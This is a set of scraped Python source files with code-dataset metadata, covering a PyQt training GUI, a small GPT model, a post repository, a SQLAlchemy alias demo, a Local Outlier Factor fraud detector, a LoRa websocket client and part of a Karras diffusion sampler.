data_layout.addWidget(self.label_data_stat_v_i, 4, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_b, 5, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
# --- initialization
self.profile_list.setFixedWidth(300)
self.profile_list.itemSelectionChanged.connect(self.change_profile_selection)
button_remove.clicked.connect(self.remove_profile_clicked)
def init_session_widgets(self, layout, panel):
# --- declarations
self.session_list = QListWidget()
label = QtWidgets.QLabel("Training Sessions")
gb_training = QtWidgets.QGroupBox('Training')
self.session_slider = Slider('session #', 1, 100, 1)
self.epoch_slider = Slider('epoch #', 1, 1000, 10)
self.fit_button = QtWidgets.QPushButton('Fit')
self.time_label = QtWidgets.QLabel("")
clear_button = QtWidgets.QPushButton('Clear')
self.gb_state = QtWidgets.QGroupBox('Status')
status_grid = QtWidgets.QGridLayout(self.gb_state)
self.label_current = QtWidgets.QLabel('cur: (0.000, 0.000, 0.000)')
self.label_best_mean = QtWidgets.QLabel('best m: (0.000, 0.000, 0.000)')
self.label_best_crack = QtWidgets.QLabel('best c: (0.000, 0.000, 0.000)')
self.label_best_inactive = QtWidgets.QLabel('best i: (0.000, 0.000, 0.000)')
button_export_current = QtWidgets.QPushButton('Export')
button_export_best_m = QtWidgets.QPushButton('Export')
button_export_best_c = QtWidgets.QPushButton('Export')
button_export_best_i = QtWidgets.QPushButton('Export')
self.label_batch = QtWidgets.QLabel()
self.label_phase = QtWidgets.QLabel()
self.label_time = QtWidgets.QLabel()
val_button = QtWidgets.QPushButton('Validate')
self.button_clone_model = QtWidgets.QPushButton('Set Checkpoint')
self.button_clone_data = QtWidgets.QPushButton('Set Data')
# --- layout
layout.addWidget(label)
layout.addWidget(self.session_list)
layout.addWidget(gb_training)
training_layout, _ = add_vlayout(layout)
training_layout.addWidget(self.button_clone_model)
training_layout.addWidget(self.button_clone_data)
training_layout.addWidget(self.session_slider)
training_layout.addWidget(self.epoch_slider)
training_layout.addWidget(clear_button)
training_layout.addWidget(val_button)
training_layout.addWidget(self.fit_button)
training_layout.addWidget(self.time_label)
layout.addWidget(self.gb_state)
status_grid.addWidget(self.label_current, 0, 0)
status_grid.addWidget(self.label_best_mean, 1, 0)
status_grid.addWidget(self.label_best_crack, 2, 0)
status_grid.addWidget(self.label_best_inactive, 3, 0)
status_grid.addWidget(button_export_current, 0, 1)
status_grid.addWidget(button_export_best_m, 1, 1)
status_grid.addWidget(button_export_best_c, 2, 1)
status_grid.addWidget(button_export_best_i, 3, 1)
layout.addWidget(self.label_phase)
layout.addWidget(self.label_batch)
layout.addWidget(self.label_time)
# --- initialization
panel.setFixedWidth(250)
self.session_list.currentRowChanged.connect(self.session_selection_changed)
gb_training.setLayout(training_layout)
self.fit_button.clicked.connect(self.click_fit)
button_export_current.clicked.connect(self.button_export_current)
button_export_best_c.clicked.connect(self.button_export_best_c)
button_export_best_i.clicked.connect(self.button_export_best_i)
button_export_best_m.clicked.connect(self.button_export_best_m)
clear_button.clicked.connect(self.button_clear_session_clicked)
self.button_clone_model.clicked.connect(self.button_clone_model_clicked)
self.button_clone_data.clicked.connect(self.button_clone_data_clicked)
val_button.clicked.connect(self.click_validate)
panel.setFixedWidth(350)
def init_monitoring_widgets(self, layout):
# declarations
tab = QtWidgets.QTabWidget()
self.canvas = CustomCanvas()
acc_panel = QtWidgets.QWidget()
self.acc_layout = QtWidgets.QVBoxLayout()
self.acc_canvas = FigureCanvasQTAgg(self.acc_figure)
epoch_slider = Slider("max epoch", 10, 500, self.acc_cnt)
smooth_slider = Slider("running average cnt", 1, 20, self.rolling_average)
self.profile_acc_check_gb = QtWidgets.QGroupBox('Visible')
# layout
layout.addWidget(tab)
tab.addTab(self.canvas, "Session Plot")
tab.addTab(acc_panel, "Accuracies")
self.acc_layout.addWidget(self.acc_canvas)
self.acc_layout.addWidget(epoch_slider)
layout.addWidget(smooth_slider)
# initializations
tab.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Ignored)
self.canvas.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Expanding)
acc_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Expanding)
acc_panel.setLayout(self.acc_layout)
epoch_slider.value_changed.connect(self.epoch_slider_value_changed)
smooth_slider.value_changed.connect(self.smooth_slider_value_changed)
smooth_slider.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Fixed)
def init_widgets(self):
main = QtWidgets.QWidget()
self.setCentralWidget(main)
main_layout = QtWidgets.QHBoxLayout()
main.setLayout(main_layout)
config_layout, config_panel = add_vlayout(main_layout)
profile_layout, profile_panel = add_vlayout(main_layout)
session_layout, session_panel = add_vlayout(main_layout)
monitoring_layout, monitoring_panel = add_vlayout(main_layout)
self.init_config_widgets(config_layout)
self.init_profile_widgets(profile_layout)
self.init_session_widgets(session_layout, session_panel)
self.init_monitoring_widgets(monitoring_layout)
config_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed,
QtWidgets.QSizePolicy.Policy.Expanding)
profile_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed,
QtWidgets.QSizePolicy.Policy.Expanding)
session_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed,
QtWidgets.QSizePolicy.Policy.Expanding)
monitoring_panel.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,
QtWidgets.QSizePolicy.Policy.Expanding)
| Falrach94/deeplearning_ex4 | gui/MainWindow.py | MainWindow.py | py | 26,881 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.backends.backend_qtagg.FigureCanvasQTAgg",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "matplotlib.figure.Figure",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "PyQt6.QtWidgets.QMainWindow",
"line_number": 35,
"usage_type... |
69982633063 | import torch
import torch.nn as nn
from torch.nn import functional as F
import math
from typing import Tuple
device = "cuda" if torch.cuda.is_available() else "cpu"
class Embedding(nn.Module):
    def __init__(self,
                 config,
                 vocab_size):
        """
        Embedding generates a learnable representation of an input sequence
        which encodes contextual, semantic meaning for each token.

        Params:
            config(dict): must provide "d_model" (embedding dimension),
                "context_length" (maximum sequence length, sizes the
                positional table) and "dropout" (dropout probability).
            vocab_size(int): number of unique tokens in the vocabulary.
        """
        super().__init__()
        self.vocab_size = vocab_size
        self.token_embedding_table = nn.Embedding(num_embeddings=vocab_size,
                                                  embedding_dim=config["d_model"])
        self.position_embedding_table = nn.Embedding(num_embeddings=config["context_length"],
                                                     embedding_dim=config["d_model"])
        self.dropout = nn.Dropout(p=config["dropout"])

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        """Return token + positional embeddings, [B, S, d_model].

        Bug fix: the original applied dropout twice (once when combining
        the embeddings and again on return), squaring the keep probability.
        """
        # x => [B, S]
        B, S = x.shape
        token_emb = self.token_embedding_table(x)  # [B, S, D]
        # Position indices follow the input's device rather than a
        # module-level global, so the layer works wherever the input lives.
        pos_emb = self.position_embedding_table(
            torch.arange(S, device=x.device)).unsqueeze(0)  # [1, S, D]
        return self.dropout(token_emb + pos_emb)
class AttentionHead(nn.Module):
    """A single scaled dot-product attention head projecting d_model -> head_dim."""

    def __init__(self,
                 config) -> None:
        super().__init__()
        d_model, head_dim = config["d_model"], config["head_dim"]
        self.d_model = d_model
        self.head_dim = head_dim
        self.query = nn.Linear(d_model, head_dim)
        self.key = nn.Linear(d_model, head_dim)
        self.value = nn.Linear(d_model, head_dim)
        self.dropout = nn.Dropout(p=config["dropout"])

    def forward(self,
                query: torch.Tensor,
                key: torch.Tensor,
                value: torch.Tensor,
                mask=None) -> torch.Tensor:
        # query => [B, Q, D]; key/value => [B, K, D]
        q_proj = self.query(query)   # [B, Q, head_dim]
        k_proj = self.key(key)       # [B, K, head_dim]
        v_proj = self.value(value)   # [B, K, head_dim]
        scores = torch.matmul(q_proj, k_proj.transpose(1, 2))  # [B, Q, K]
        if mask is not None:
            # Positions where the mask is 0 may not be attended to.
            scores = scores.masked_fill(mask == 0, value=float("-inf"))
        # Scaling happens inside the softmax argument; -inf entries stay
        # -inf, so masking is unaffected by the division.
        attn = F.softmax(scores / math.sqrt(self.head_dim), dim=-1)
        context = torch.matmul(attn, v_proj)  # [B, Q, head_dim]
        return self.dropout(context)
class MultiHeadAttention(nn.Module):
    # Runs n_heads independent AttentionHeads, concatenates their outputs
    # along the feature dim, and mixes them with a linear projection.
    def __init__(self,
                 config) -> None:
        super().__init__()
        self.sa_heads = nn.ModuleList([AttentionHead(config) for _ in range(config["n_heads"])])
        self.proj = nn.Linear(config["d_model"], config["d_model"])
        self.dropout = nn.Dropout(p=config["dropout"])

    def forward(self,
                query: torch.Tensor,
                key: torch.Tensor,
                value: torch.Tensor,
                mask=None) -> torch.Tensor:
        # Each head yields [B, Q, head_dim]; the concatenation assumes
        # n_heads * head_dim == d_model so proj's input width matches.
        out = torch.cat([h(query, key, value, mask) for h in self.sa_heads], dim=-1)
        out = self.proj(out)
        return self.dropout(out)
class FeedForward(nn.Module):
    """Position-wise MLP: expand to 4*d_model, ReLU, project back, dropout."""

    def __init__(self,
                 config):
        super().__init__()
        width = config["d_model"]
        hidden = width * 4
        self.net = nn.Sequential(
            nn.Linear(width, hidden),
            nn.ReLU(),
            nn.Linear(hidden, width),
            nn.Dropout(p=config["dropout"]),
        )

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self.net(x)
class GPTDecoderBlock(nn.Module):
    # One pre-norm transformer block: LayerNorm -> self-attention -> residual,
    # then LayerNorm -> feed-forward -> residual.
    def __init__(self, config) -> None:
        super().__init__()
        self.mha = MultiHeadAttention(config)
        self.ff = FeedForward(config)
        self.ln_1 = nn.LayerNorm(normalized_shape=config["d_model"])
        self.ln_2 = nn.LayerNorm(normalized_shape=config["d_model"])

    def forward(self, x: torch.Tensor, mask=None) -> torch.Tensor:
        # Self-attention: the same normalized tensor serves as q, k and v.
        x = x + self.mha(self.ln_1(x), self.ln_1(x), self.ln_1(x), mask)
        x = x + self.ff(self.ln_2(x))
        return x
class GPTDecoder(nn.Module):
    # A stack of n_decoders identical decoder blocks applied in sequence,
    # all sharing the same causal mask.
    def __init__(self, config) -> None:
        super().__init__()
        self.blocks = nn.ModuleList([GPTDecoderBlock(config) for _ in range(config["n_decoders"])])

    def forward(self, x: torch.Tensor, mask=None) -> torch.Tensor:
        for block in self.blocks:
            x = block(x, mask)
        return x
class PoemGPT(nn.Module):
    # Decoder-only language model: token+position embedding, GPT decoder
    # stack, and a linear LM head over the vocabulary.
    def __init__(self, config, vocab_size) -> None:
        super().__init__()
        self.context_length = config["context_length"]
        self.embedding = Embedding(config, vocab_size)
        self.gpt = GPTDecoder(config)
        self.lm_head = nn.Linear(config["d_model"], vocab_size)

    def forward(self,
                x: torch.Tensor,
                targets: torch.Tensor = None) -> Tuple[torch.Tensor, torch.Tensor]:
        B, S = x.shape
        # x -> [B, S] token ids, targets -> [B, S] next-token ids (or None)
        x = self.embedding(x)  # B, S, D_MODEL
        # Causal mask: position i may only attend to positions <= i.
        mask = create_causal_mask(S)
        x = self.gpt(x, mask)  # B, S, D_MODEL
        logits = self.lm_head(x)  # B, S, VOCAB_SIZE
        if targets is None:
            loss = None
        else:
            # Flatten batch and sequence dims for cross-entropy; note the
            # returned logits are flattened to [B*S, VOCAB_SIZE] here.
            logits = logits.view(B*S, -1)
            targets = targets.view(-1)
            loss = F.cross_entropy(logits, targets)
        return logits, loss

    def generate(self, x: torch.Tensor = None, max_new_tokens: int = 500) -> torch.Tensor:
        # Autoregressively sample max_new_tokens tokens, starting from x
        # (or from a single zero token on the module-level device if None).
        if x is None:
            x = torch.zeros((1, 1), dtype=torch.long, device=device)  # B, S
        for _ in range(max_new_tokens):
            # Feed only the last context_length tokens so positional
            # embeddings stay within the table's range.
            preds, _ = self(x[:, -self.context_length:])  # B, S, VOCAB_SIZE
            preds = preds[:, -1, :]  # logits of the final position: B, VOCAB_SIZE
            probs = F.softmax(preds, dim=-1)
            x_next = torch.multinomial(input=probs, num_samples=1)  # B, 1
            x = torch.cat((x, x_next), dim=1)  # B, S+1
        return x
def create_causal_mask(sz):
    """Return an (sz, sz) lower-triangular float mask on the module-level
    device: 1.0 where attention is allowed (col <= row), 0.0 elsewhere."""
    return torch.tril(torch.ones((sz, sz), device=device))
{
"api_name": "torch.cuda.is_available",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
... |
198794662 | import abc
from typing import Dict, List
from uuid import UUID
from moderation_ml_example.models import Post
class PostNotFoundError(Exception):
    """Raised when a repository lookup references a post id that does not exist."""
    pass
class PostRepository(metaclass=abc.ABCMeta):
    """Abstract interface for post persistence.

    Bug fix: the original assigned ``__metaclass__ = abc.ABCMeta`` inside
    the class body, which is Python 2 syntax and is silently ignored by
    Python 3 -- the class was a plain ``object``. The metaclass is now
    passed as a keyword. No method is marked ``@abc.abstractmethod``
    (matching the original, which kept the base instantiable), so this is
    purely the metaclass repair.
    """

    async def save(self, post: Post) -> None:
        """Persist (insert or replace) the given post."""
        ...

    async def get(self, id: UUID) -> Post:
        """Return the post with the given id; raise PostNotFoundError if absent."""
        ...

    async def list(self) -> List[Post]:
        """Return every stored post."""
        ...

    async def list_unmoderated(self) -> List[Post]:
        """Return the posts that still require moderation."""
        ...
class InMemoryPostRepository(PostRepository):
    """Dict-backed PostRepository for tests and local use.

    Posts are copied on the way in and on the way out so callers cannot
    mutate the stored state through shared references.
    """

    def __init__(self):
        # Maps post id -> stored Post snapshot.
        self._posts: Dict[UUID, Post] = {}

    async def save(self, post: Post) -> None:
        # Store a defensive copy keyed by the post's own id.
        self._posts[post.id] = post.copy()

    async def get(self, id: UUID) -> Post:
        try:
            return self._posts[id].copy()
        except KeyError as exc:
            # Translate the dict miss into the domain error, keeping the
            # original KeyError as the exception cause.
            raise PostNotFoundError(f"Post with id {id} cannot be found") from exc

    async def list(self) -> List[Post]:
        return [post.copy() for post in self._posts.values()]

    async def list_unmoderated(self) -> List[Post]:
        return [
            post.copy()
            for post in self._posts.values()
            if post.requires_moderation
        ]
| mikeyjkmo/post-moderation-example | moderation_ml_example/repository.py | repository.py | py | 1,156 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "abc.ABCMeta",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "moderation_ml_example.models.Post",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "uuid.UUID",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "moderati... |
from sqlalchemy import create_engine, text, MetaData, Table, Column, Integer, String, select

# Demo of SQLAlchemy Core table aliases against a local Postgres database.
engine = create_engine('postgresql://postgres:1@localhost/news_db')

meta = MetaData()

# Schema description only; creation is commented out below because the
# table is assumed to already exist in the database.
students = Table(
    'students', meta,
    Column('id', Integer, primary_key=True),
    Column('first_name', String),
    Column('last_name', String))

# meta.create_all(engine)

conn = engine.connect()

# Create an alias of the table and select rows with id > 2 through it.
st = students.alias()
s = st.select().where(st.c.id > 2)
result = conn.execute(s).fetchall()
print(result)
| devabsaitov/self_study | sqlalchemy_lesson/Basic/7_using_aliases.py | 7_using_aliases.py | py | 494 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.MetaData",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Table",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sqlalchemy... |
2926954909 | import pandas as pd
import numpy as np
from multiprocessing.pool import ThreadPool
from multiprocessing import cpu_count
import operator
from collections import OrderedDict
import itertools
import time
from sklearn.metrics import accuracy_score
import visualization
visuals = visualization.Visualization()
class Local_Outlier_Factor:
    '''
    Brute-force Local Outlier Factor (LOF) implementation.

    Works either on a pandas DataFrame (``DATA`` with ``DATA_FLAG = True``)
    or on a plain list of points (``SAMPLE_DATA``).  Scores above ``THRESH``
    are labelled 1 (outlier), otherwise 0.  Depends on the module-level
    ``visuals`` object for dimensionality reduction and plotting state.

    @Author: Naren Surampudi
    '''
    def __init__(self):
        self.K = 2                 # number of nearest neighbours considered
        self.DATA = None           # pandas DataFrame input (when DATA_FLAG)
        self.SAMPLE_DATA = None    # plain list-of-points input
        self.DATA_FLAG = True      # True -> use DATA, False -> SAMPLE_DATA
        self.THRESH = 1            # LOF score above which a point is an outlier
        self.REDUCED_POINTS = []   # 2-D projections collected for plotting
    def neighborhood(self):
        """Compute, for every point, its K nearest neighbours (Manhattan
        distance) and its local reachability density (LRD).

        Returns ``[lrds, neighbors_dict]`` where ``neighbors_dict`` maps a
        point index to a list of ``(neighbour_index, distance)`` pairs.
        O(n^2) pairwise scan.
        """
        if self.DATA_FLAG:
            val_data = self.DATA.values.tolist()
        else:
            val_data = self.SAMPLE_DATA # for sample sets
        lrds = []
        reach_distances = []  # NOTE(review): never used
        read_index1 = 0
        neighbors_dict = {}
        reduced_points = []   # NOTE(review): never used (REDUCED_POINTS is used instead)
        for reading1 in val_data:
            self.REDUCED_POINTS.append(visuals.dimension_reduction(reading1))
            neighbors = {}
            neighbors_dict[read_index1] = []
            read_index2 = 0
            for reading2 in val_data:
                if read_index1 != read_index2:
                    print("Reading indices: " + str(read_index1) + " " + str(read_index2))
                    # Manhattan (L1) distance between the two points.
                    distance = sum(abs(np.array(list(reading1)) - np.array(list(reading2))))
                    distance = round(distance, ndigits=2)
                    neighbors[read_index2] = distance
                read_index2 = read_index2 + 1
            # Keep only the K closest neighbours, ordered by distance.
            sorted_temp = sorted(neighbors.items(), key=lambda kv: kv[1])
            neighbors = OrderedDict(sorted_temp)
            neighbors = list(itertools.islice(neighbors.items(), 0, self.K))
            # print(neighbors)
            for n in neighbors:
                neighbors_dict[read_index1].append(n)
            lrds.append(self.LRD(neighbors, self.K))
            read_index1 = read_index1 + 1
        return [lrds, neighbors_dict]
    def K_element_dist(self, read_index1, K):
        """Return the distance to the K-th nearest neighbour of the point at
        ``read_index1`` (the "k-distance").

        NOTE(review): the ``K`` parameter is ignored; ``self.K`` is used.
        """
        if self.DATA_FLAG:
            val_data = self.DATA.values.tolist()
        else:
            val_data = self.SAMPLE_DATA
        k_dists = []
        reading1 = val_data[read_index1]
        read_index2 = 0
        for reading2 in val_data:
            if read_index1 != read_index2:
                distance = sum(abs(np.array(list(reading1)) - np.array(list(reading2))))
                distance = round(distance, ndigits=2)
                k_dists.append(distance)
            read_index2 = read_index2 + 1
        k_dists.sort()
        k_dists = k_dists[0:self.K]
        # print(k_dists)
        return k_dists[-1]
    def LRD(self, neighbors, K):
        """Local reachability density: |neighbours| / sum of reach distances."""
        k_nearest_count = len(neighbors)
        reach_distance_sum = self.reach_distance(neighbors, self.K)
        lrd = k_nearest_count / reach_distance_sum
        return lrd
    def reach_distance(self, neighbors, K):
        """Sum of reachability distances: max(k-distance(o), d(p, o)) over
        each neighbour ``o`` given as an ``(index, distance)`` pair."""
        rds = []
        for element in neighbors:
            rd = max(self.K_element_dist(element[0], self.K), element[1])
            rds.append(rd)
        return sum(rds)
    def LOF(self, lrds, neighbors_dict, K):
        """Compute a binarized LOF label per point.

        Scores above ``self.THRESH`` become 1 (outlier) and the point's 2-D
        projection is pushed into ``visuals.OUTLIERS``; otherwise 0.
        """
        lofs = []
        # print(neighbors_dict)
        for element in neighbors_dict.keys():
            print("Calculating LOF for: " + str(element))
            neighbors = neighbors_dict[element]
            lrd_sum = 0
            reach_dist_sum = self.reach_distance(neighbors, self.K)
            for n in neighbors:
                lrd_sum = lrd_sum + lrds[n[0]]
                # reach_dist_sum = reach_dist_sum + reach_distances[n]
            lof = (lrd_sum * reach_dist_sum) / (self.K**2)
            lof = round(lof, ndigits=2)
            # specific for fraud detection
            if lof > self.THRESH:
                lof = 1
                visuals.OUTLIERS.append(self.REDUCED_POINTS[element])
            else:
                lof = 0
                visuals.NON_OUTLIERS.append(self.REDUCED_POINTS[element])
            lofs.append(lof)
        return lofs
    def container(self):
        """Convenience entry point: neighbourhood pass followed by LOF scoring."""
        lof_reqs = self.neighborhood()
        lofs = self.LOF(lof_reqs[0], lof_reqs[1], self.K)
        return lofs
if __name__ == "__main__":
    # Entry point: run LOF either on the credit-card CSV (DATA_FLAG True)
    # or on the tiny built-in sample set (DATA_FLAG False), timing the run.
    lof_class = Local_Outlier_Factor()
    credit_data = pd.read_csv('../creditcard_nomralized.csv')  # path kept as-is (matches file on disk)
    y = credit_data['Class']
    req_cols = []
    for i in range(1, 29):
        req_cols.append('V' + str(i))
    req_cols.append('Time')
    req_cols.append('Amount')
    data = credit_data[req_cols]
    sample_data = [[0,0],[0,1],[1,1],[3,0]] # some sample data
    lof_class.DATA = data[0:10000]
    lof_class.SAMPLE_DATA = sample_data
    lof_class.DATA_FLAG = False
    if lof_class.DATA_FLAG:
        lof_class.K = 20
        lof_class.THRESH = 1.5
    val_y = y[0:10000]
    pool = ThreadPool(processes=cpu_count())
    # lof_reqs = (pool.apply_async(lof_class.neighborhood)).get()
    # print(type(neighbors))
    # print(data.values.tolist()[0])
    # lofs = lof_class.LOF(lof_reqs[0], lof_reqs[1], lof_class.K)
    # Bug fix: time.clock() was removed in Python 3.8; perf_counter() is the
    # documented replacement for wall-clock interval timing.
    start_time = time.perf_counter()
    lofs = (pool.apply_async(lof_class.container)).get()
    stop_time = time.perf_counter()
    run_time = stop_time - start_time
    # print(lofs)
    if lof_class.DATA_FLAG:
        print("Accuracy: " + str(accuracy_score(lofs, val_y)))
    print("Time: " + str(run_time))
    visuals.outlier_plot()
| aditya-srikanth/Data-Mining-Assignment-3 | LOF.py | LOF.py | py | 5,514 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "visualization.Visualization",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "collections.OrderedDict",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "itert... |
20101978227 | import cache
import timer
import lora
import websockets
import asyncio
import threading
import keyboard
import timestamp
def thread_function():
    """Worker loop: keep running the countdown timer until shutdown is requested."""
    while not cache.stop_thread:
        timer.countdown(cache.t)
def thread_function_killer():
    """Watch the keyboard and flag shutdown when the user presses 'q'."""
    while not cache.stop_thread:
        events = keyboard.record(until='q')
        first_event = str(events[0])
        if first_event in ("KeyboardEvent(q down)", "KeyboardEvent(q up)"):
            print('\nYou terminated the program!\nGoodbye\n.')
            cache.stop_thread = True
            break
def thread_function_bdreg():
    """Background monitor: flush the in-memory flow cache either when the
    timer thread raises ``cache.time_thread`` or when the cache grows past
    ``cache.cache_max_size``.  Each flush is recorded as a "flow mark"."""
    while (not cache.stop_thread):
        # Timer-triggered flush.
        if cache.time_thread == True:
            time = timestamp.timestamp()
            cache_len = len(cache.cache)
            if cache_len > 0:
                print("\n[CACHE FLUSH]")
                lora.cacheClear(time)
            else:
                print("\n[CACHE FLUSH EMPTY]")
            cache.marcos_fluxos.append(time)
            cache.numero_fluxos += 1
            cache.time_thread = False
        #if cache.expire_thread == True:
        #    time = timestamp.timestamp()
        #    cache_len = len(cache.cache)
        #    if cache_len > 0:
        #        lora.reg_expire(time)
        #    cache.expire_thread = False
        # Size-triggered flush.
        if len(cache.cache) >= cache.cache_max_size :
            time = timestamp.timestamp()
            cache_len = len(cache.cache)
            if cache_len > 0:
                print("\n[CACHE SIZE FLUSH]")
                lora.cacheClear(time)
            # NOTE(review): unlike the timer branch above, this "EMPTY"
            # message prints unconditionally after every size flush --
            # confirm whether it was meant to be in an else branch.
            print("\n[CACHE SIZE FLUSH EMPTY]")
            cache.marcos_fluxos.append(time)
            cache.numero_fluxos += 1
    return
def main():
    """Start the background threads and run the websocket listener until
    ``cache.stop_thread`` is set."""
    x = threading.Thread(target=thread_function)
    #y = threading.Thread(target=thread_function_killer)
    z = threading.Thread(target = thread_function_bdreg)
    #y.start()
    z.start()
    x.start()
    # Asynchronous function that connects to the server and handles the
    # incoming messages.
    async def listen():
        # Connect to the server.
        async with websockets.connect(cache.url, ping_interval=None) as ws:
            await ws.send("") # test connection
            # Keep running continuously, listening to every incoming message.
            while (not cache.stop_thread):
                print("Listening")
                if cache.stop_thread == True:
                    return
                msg = await ws.recv()
                # Check whether it is an error message; if not, build a flow
                # record and store it in the cache.
                fluxo = lora.createFlow(msg)
                if fluxo != None:
                    cache.cache.append(fluxo)
                    print("\nFLOW UPDATED TO CACHE:\n---------------------------")
                print(f"\n Último fluxo em: {cache.marcos_fluxos} | Fluxos registrados: {cache.numero_fluxos} | Mensagens totais: {cache.numero_mensagens}\n")
    # Run listen() to completion: both the connection and the message
    # reception are asynchronous, so we drive them through the event loop.
    asyncio.get_event_loop().run_until_complete(listen())
if __name__ == "__main__":
main() | juliogcm/lorawan-flow | websocket_client/client.py | client.py | py | 3,331 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cache.stop_thread",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "timer.countdown",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cache.t",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "cache.stop_thread... |
22565647008 | import numpy as np
import torch as th
from .gaussian_diffusion import GaussianDiffusion, mean_flat
class KarrasDenoiser:
    """Preconditioned denoiser from Karras et al. (2022), "Elucidating the
    Design Space of Diffusion-Based Generative Models"."""

    def __init__(self, sigma_data: float = 0.5):
        self.sigma_data = sigma_data

    def get_snr(self, sigmas):
        """Signal-to-noise ratio implied by the given noise levels."""
        return sigmas ** -2

    def get_sigmas(self, sigmas):
        """Identity: sigmas are already the noise levels in this scheme."""
        return sigmas

    def get_scalings(self, sigma):
        """Return the (c_skip, c_out, c_in) preconditioning coefficients."""
        c_skip = self.sigma_data ** 2 / (sigma ** 2 + self.sigma_data ** 2)
        c_out = sigma * self.sigma_data / (sigma ** 2 + self.sigma_data ** 2) ** 0.5
        c_in = 1 / (sigma ** 2 + self.sigma_data ** 2) ** 0.5
        return c_skip, c_out, c_in

    def training_losses(self, model, x_start, sigmas, model_kwargs=None, noise=None):
        """Compute per-sample training losses for one noisy batch.

        Returns a dict with "mse" (preconditioned target loss), "xs_mse"
        (denoised-vs-clean diagnostic) and "loss".
        """
        if model_kwargs is None:
            model_kwargs = {}
        if noise is None:
            noise = th.randn_like(x_start)

        dims = x_start.ndim
        x_t = x_start + noise * append_dims(sigmas, dims)
        c_skip, c_out, _ = (append_dims(c, dims) for c in self.get_scalings(sigmas))

        model_output, denoised = self.denoise(model, x_t, sigmas, **model_kwargs)
        target = (x_start - c_skip * x_t) / c_out

        terms = {
            "mse": mean_flat((model_output - target) ** 2),
            "xs_mse": mean_flat((denoised - x_start) ** 2),
        }
        # "vb" is never produced here; kept for parity with GaussianDiffusion.
        terms["loss"] = terms["mse"] + terms["vb"] if "vb" in terms else terms["mse"]
        return terms

    def denoise(self, model, x_t, sigmas, **model_kwargs):
        """Run the model with Karras preconditioning.

        Returns (raw model output, reconstructed x0 estimate).
        """
        c_skip, c_out, c_in = (append_dims(c, x_t.ndim) for c in self.get_scalings(sigmas))
        rescaled_t = 1000 * 0.25 * th.log(sigmas + 1e-44)
        model_output = model(c_in * x_t, rescaled_t, **model_kwargs)
        denoised = c_out * model_output + c_skip * x_t
        return model_output, denoised
class GaussianToKarrasDenoiser:
    """Adapter exposing a Gaussian diffusion model through the Karras
    denoiser interface (sigma-based instead of timestep-based)."""

    def __init__(self, model, diffusion):
        from scipy import interpolate

        self.model = model
        self.diffusion = diffusion
        # Invert the alpha-bar schedule so sigmas can be mapped back to
        # (fractional) timesteps via linear interpolation.
        self.alpha_cumprod_to_t = interpolate.interp1d(
            diffusion.alphas_cumprod, np.arange(0, diffusion.num_timesteps)
        )

    def sigma_to_t(self, sigma):
        """Map a Karras sigma to a (possibly fractional) diffusion timestep,
        clamped to [0, num_timesteps - 1]."""
        alpha_cumprod = 1.0 / (sigma**2 + 1)
        schedule = self.diffusion.alphas_cumprod
        if alpha_cumprod > schedule[0]:
            return 0
        if alpha_cumprod <= schedule[-1]:
            return self.diffusion.num_timesteps - 1
        return float(self.alpha_cumprod_to_t(alpha_cumprod))

    def denoise(self, x_t, sigmas, clip_denoised=True, model_kwargs=None):
        """Denoise x_t at the given sigmas via the wrapped Gaussian model.

        Returns (None, x0 prediction) to mirror KarrasDenoiser.denoise.
        """
        t = th.tensor(
            [self.sigma_to_t(s) for s in sigmas.cpu().numpy()],
            dtype=th.long,
            device=sigmas.device,
        )
        c_in = append_dims(1.0 / (sigmas**2 + 1) ** 0.5, x_t.ndim)
        out = self.diffusion.p_mean_variance(
            self.model, x_t * c_in, t, clip_denoised=clip_denoised, model_kwargs=model_kwargs
        )
        return None, out["pred_xstart"]
def karras_sample(*args, **kwargs):
    """Run the progressive Karras sampler and return only the final sample."""
    final = None
    for step in karras_sample_progressive(*args, **kwargs):
        final = step["x"]
    return final
def karras_sample_progressive(
    diffusion,
    model,
    shape,
    steps,
    clip_denoised=True,
    progress=False,
    model_kwargs=None,
    device=None,
    sigma_min=0.002,
    sigma_max=80,  # higher for highres?
    rho=7.0,
    sampler="heun",
    s_churn=0.0,
    s_tmin=0.0,
    s_tmax=float("inf"),
    s_noise=1.0,
    guidance_scale=0.0,
):
    """Sample with a Karras-style ODE solver, yielding every intermediate step.

    Accepts either a KarrasDenoiser or a GaussianDiffusion (which is wrapped
